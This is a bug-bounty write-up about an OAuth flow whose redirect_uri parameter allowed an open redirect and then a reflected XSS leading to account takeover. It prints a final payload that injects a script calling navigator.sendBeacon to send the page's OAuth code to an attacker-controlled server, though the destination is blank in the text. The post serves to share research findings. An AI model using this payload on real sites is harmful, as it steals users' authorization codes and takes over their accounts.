Never Give Up, The Story Behind a Dupe To a Triaged

4 years ago 198

Alan Brian @soyelmago

This is the story about how I get a dupe (within a 24hs!) and get another (valid) vulnerability with the same impact.

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The application used the Oauth mechanism to authenticate. The endpoint was like this:[REDACTED]&redirect_uri=[TOKEN_REDACTED]&response_type=code&scope=openid+accounts&state=[REDACTED]

After seeing that, I quickly changed redirect_uri parameter to my server and I saw how the application redirects me to my server… so at this point, I found an Open Redirect vulnerability on Let’s get an Account Takeover vulnerability!

So, in my PoC, I made that the redirect_uri parameter point to my server and just that, because the Oauth code is sent in request too. So, that was easy. I made the report, send it and after 3 days I get the duplicated…

yes, I know what you are thinking, that was a very low hanging fruit, but… I needed to try, and that’s what this story is about, to keep trying!

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Keep trying

I think a while how to do the same (Account Takeover) but with different techniques. And on my mind pop an idea like popup in XSS vulnerability ;-)

If I can explode an XSS vulnerability in that endpoint, maybe I can steal the Oauth token. And that is, I made the following PoC:[REDACTED]&redirect_uri=[TOKEN_REDACTED]&response_type=code&scope=openid+accounts&state=[REDACTED]

And it’s work!

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But, what makes the difference between a simple JavaScript popup and ATO (Account TakeOver)? a cool payload, so let’s try to figure it out (thanks @mastersec !)

Final Payload:


Final URL:[REDACTED]&redirect_uri=aaa”><script>navigator.sendBeacon(‘',document.documentElement.innerHTML.split('code'));</script>&request=[TOKEN_REDACTED]&response_type=code&scope=openid+accounts&state=[REDACTED] is a site that allow to you to test for example, SSRF vulnerabilities.

And the result was the token submitted to the server that I control. WIN

I submitted the vulnerability and finally, after 2 days I got the triaged and the bounty $$$ :-)

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So, always remember, KEEP TRYING!

I hope you enjoy this write up. Happy Hacking-Hunting

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